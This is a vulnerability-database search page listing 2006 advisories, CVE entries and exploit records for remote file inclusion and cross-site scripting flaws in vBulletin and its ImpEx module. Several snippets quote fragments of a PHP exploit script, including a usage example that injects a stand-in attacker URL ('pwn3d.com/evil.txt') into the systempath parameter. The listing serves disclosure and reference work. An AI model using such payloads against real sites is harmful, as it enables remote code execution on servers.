Lucene search
+L

1688 matches found

Packet Storm
Packet Storm
added 2006/04/19 12:00 a.m.39 views

VBulletinImpEx.txt

Remote File Inclusion in VBulletin ImpEx Date : 12 / 4 / 2006 Software : VBulletin ImpEx version : VBulletin 3.5.1 VBulletin 3.5.2 VBulletin 3.5.4 The bug reside in : ImpExModule.php ImpExController.php ImpExDisplay.php Exploit : 1...

7.4AI score
SaveExploits0
Prion
Prion
added 2006/04/18 10:02 a.m.20 views

Remote file inclusion

PHP remote file inclusion vulnerability in VBulletin 3.5.1, 3.5.2, and 3.5.4 allows remote attackers to execute arbitrary code via a URL in the systempath parameter to 1 ImpExModule.php, 2 ImpExController.php, and 3 ImpExDisplay.php...

5CVSS8.3AI score0.0294EPSS
SaveExploits0References8Affected Software1
NVD
NVD
added 2006/04/18 10:02 a.m.26 views

CVE-2006-1816

PHP remote file inclusion vulnerability in VBulletin 3.5.1, 3.5.2, and 3.5.4 allows remote attackers to execute arbitrary code via a URL in the systempath parameter to 1 ImpExModule.php, 2 ImpExController.php, and 3 ImpExDisplay.php...

5CVSS7.7AI score0.0294EPSS
SaveExploits0References8
Cvelist
Cvelist
added 2006/04/18 10:00 a.m.30 views

CVE-2006-1816

PHP remote file inclusion vulnerability in VBulletin 3.5.1, 3.5.2, and 3.5.4 allows remote attackers to execute arbitrary code via a URL in the systempath parameter to 1 ImpExModule.php, 2 ImpExController.php, and 3 ImpExDisplay.php...

7.7AI score0.0294EPSS
SaveExploits0References8
CVE
CVE
added 2006/04/18 10:00 a.m.58 views

CVE-2006-1816

The CVE-2006-1816 entry describes a PHP remote file inclusion vulnerability in VBulletin versions 3.5.1, 3.5.2, and 3.5.4. An attacker can cause arbitrary code execution by supplying a URL via the systempath parameter to ImpExModule.php, ImpExController.php, or ImpExDisplay.php. The NVD entry lis...

5CVSS7.7AI score0.0294EPSS
SaveExploits0References8Affected Software1
exploitpack
exploitpack
added 2006/04/13 12:00 a.m.47 views

vBulletin ImpEx 1.74 - Remote Command Execution

vBulletin ImpEx 1.74 - Remote Command Execution " ."turl:" ."hurl:" ."cmd:" ."" .""; if !isset$POST'submit' echo $form; else $file = fopen "test.txt", "w+"; fwrite$file, ""; fclose$file; $file = fopen $turl.$hurl, "r"; if !$file echo "Unable to get output.\n"; exit; echo $form; while !feof $file...

1.2AI score
SaveExploits0
zdt
zdt
added 2006/04/13 12:00 a.m.125 views

vBulletin ImpEx <= 1.74 Remote Command Execution Exploit

Exploit for unknown platform in category web applications ======================================================== vBulletin ImpEx " ."turl:" ."hurl:" ."cmd:" ."" .""; if !isset$POST'submit' echo $form; else $file = fopen "test.txt", "w+"; fwrite$file, ""; fclose$file; $file = fopen $turl.$hurl,...

7.1AI score
SaveExploits0
securityvulns
securityvulns
added 2006/04/13 12:00 a.m.47 views

Remote File Inclusion in VBulletin ImpEx

Remote File Inclusion in VBulletin ImpEx Date : 12 / 4 / 2006 Software : VBulletin ImpEx version : VBulletin 3.5.1 VBulletin 3.5.2 VBulletin 3.5.4 The bug reside in : ImpExModule.php ImpExController.php ImpExDisplay.php Exploit : 1...

3.3AI score
SaveExploits0
seebug.org
seebug.org
added 2006/04/13 12:00 a.m.49 views

vBulletin ImpEx &lt;= 1.74 Remote Command Execution Exploit

No description provided by source. ?php / vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, My gf url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/impex/ImpExData.php?systempath= hurl:http://www.pwn3d.com/evil.txt? / $cm...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/04/13 12:00 a.m.107 views

vBulletin ImpEx 1.74 - Remote Command Execution

" ."turl:" ."hurl:" ."cmd:" ."" .""; if !isset$POST'submit' echo $form; else $file = fopen "test.txt", "w+"; fwrite$file, ""; fclose$file; $file = fopen $turl.$hurl, "r"; if !$file echo "Unable to get output.\n"; exit; echo $form; while !feof $file $line .= fgets $file, 1024.""; $tpos1 =...

5.8AI score
SaveExploits0
exploitpack
exploitpack
added 2006/04/07 12:00 a.m.14 views

vBulletin 3.5.1 - Vbugs.php Cross-Site Scripting

vBulletin 3.5.1 - Vbugs.php Cross-Site Scripting source: https://www.securityfocus.com/bid/17407/info vBulletin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have...

6.8AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/04/07 12:00 a.m.25 views

vBulletin 3.5.1 - 'Vbugs.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/17407/info vBulletin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of...

2.6CVSS5.8AI score0.01945EPSS
SaveExploits1
securityvulns
securityvulns
added 2006/04/07 12:00 a.m.51 views

vBulletin 3.5.x vBug Tracker XSS vuln.

vBug Tracker for vBulletin 3.5.x XSS vuln. Vuln. discovered by : r0t Date: 5 april 2006 vendor:www.vbulletin.org affected versions:vBug Tracker Version 3.5.1 and previous orginal advisory: http://pridels.blogspot.com/2006/04/vbug-tracker-for-vbulletin-35x-xss.html vBug Tracker contains a flaws th...

1.3AI score
SaveExploits0
Packet Storm
Packet Storm
added 2006/04/01 12:00 a.m.54 views

vBulletin174.txt

======================================================================================= XOR Crew :: Security Advisory 3/22/2006 ======================================================================================= vBulletin ImpEx = 1.74 - Remote Command Execution Vulnerability...

7.4AI score
SaveExploits0
securityvulns
securityvulns
added 2006/03/27 12:00 a.m.38 views

Xss Vbulletin 3.5.x &#40; test: 3.5.4 &#41;

/ ,, / / '-./.-' .--' '--. / / /"" SpiderZ ForumZ Security | | | | / / '..' = Xss Vbulletin 3.5.x test: 3.5.4 = Author: SpiderZ = Sito: www.spiderz.tk 1 -------------------------------------------------------------------- Name file: exploit.php...

7.1AI score
SaveExploits0
securityvulns
securityvulns
added 2006/03/26 12:00 a.m.33 views

New exploit by SpiderZ

Author: SpiderZ Exploit 01 phpBB 2.0.19 Topic infinitely exploit multiple topic http://spiderz.netsons.org/1.txt Exploit 02 Mini-Nuke v1.8 XSS http://spiderz.netsons.org/3.txt Exploit 03 CuteCast Version 1.2 multiple users http://spiderz.netsons.org/4.txt Exploit 04 IPB v1.x upload html .gif...

1AI score
SaveExploits0
Prion
Prion
added 2006/03/24 11:02 a.m.88 views

Remote file inclusion

PHP remote file inclusion vulnerability in impex/ImpExData.php in vBulletin ImpEx module 1.74, when registerglobals is disabled, allows remote attackers to include arbitrary files via the systempath parameter...

7.5CVSS7.4AI score0.01937EPSS
SaveExploits0References8Affected Software1
NVD
NVD
added 2006/03/24 11:02 a.m.18 views

CVE-2006-1382

PHP remote file inclusion vulnerability in impex/ImpExData.php in vBulletin ImpEx module 1.74, when registerglobals is disabled, allows remote attackers to include arbitrary files via the systempath parameter...

7.5CVSS6.9AI score0.01937EPSS
SaveExploits0References8
Cvelist
Cvelist
added 2006/03/24 11:00 a.m.26 views

CVE-2006-1382

PHP remote file inclusion vulnerability in impex/ImpExData.php in vBulletin ImpEx module 1.74, when registerglobals is disabled, allows remote attackers to include arbitrary files via the systempath parameter...

6.9AI score0.01937EPSS
SaveExploits0References8
CVE
CVE
added 2006/03/24 11:00 a.m.258 views

CVE-2006-1382

The CVE-2006-1382 issue affects the vBulletin ImpEx module 1.74. It is a PHP remote file inclusion vulnerability in ImpExData.php, exploitable via the systempath parameter when register_globals is disabled. This allows a remote attacker to include arbitrary files. The description and related sour...

7.5CVSS6.9AI score0.01937EPSS
SaveExploits0References8Affected Software1
Rows per page
Query Builder